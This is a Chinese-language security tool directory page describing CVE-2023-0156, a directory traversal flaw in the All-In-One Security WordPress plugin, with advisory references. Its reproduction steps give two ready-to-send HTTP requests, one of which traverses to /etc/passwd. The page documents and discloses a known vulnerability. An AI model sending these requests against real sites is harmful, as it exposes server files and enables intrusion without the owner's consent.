Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/b0marek/cve-2023-0156
漏洞分析漏洞利用信息收集Web安全渗透测试
GitHubb0marek/cve-2023-0156

CVE-2023-0156

CVE-2023-0156 漏洞的仓库。

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE ID: CVE-2023-0156

漏洞类型: 目录遍历

描述: 适用于 WordPress 的 All-In-One Security (AIOS) 插件在 5.1.4 及更早版本中存在目录遍历漏洞。该漏洞允许具有管理员权限的经过身份验证的攻击者读取服务器上任意文件的内容。

复现步骤:

root@kitploit:~
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 125
Content-Type: application/x-www-form-urlencoded

_wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
root@kitploit:~
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 98
Content-Type: application/x-www-form-urlencoded

_wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs

参考:

  1. https://wpscan.com/vulnerability/caf1dbb5-197e-41e9-8f48-ba1f2360a759
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0156
  3. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-security-and-firewall/all-in-one-security-aios-514-authenticatedadmin-directory-traversal
下载工具